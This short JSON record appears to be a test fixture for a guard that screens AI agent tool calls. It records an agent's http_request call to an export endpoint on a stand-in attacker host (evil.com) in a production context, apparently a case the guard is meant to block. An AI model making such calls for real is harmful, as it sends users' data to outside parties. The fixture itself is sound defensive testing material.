{
  "id": "01JFIXTUREBLOCKHTTP01",
  "shieldId": "local",
  "timestamp": "2026-07-11T12:00:00.000Z",
  "caller": {
    "id": "agent-1",
    "type": "agent"
  },
  "tool": {
    "name": "http_request"
  },
  "arguments": {
    "url": "https://evil.com/api/export",
    "method": "GET"
  },
  "context": {
    "environment": "production"
  }
}
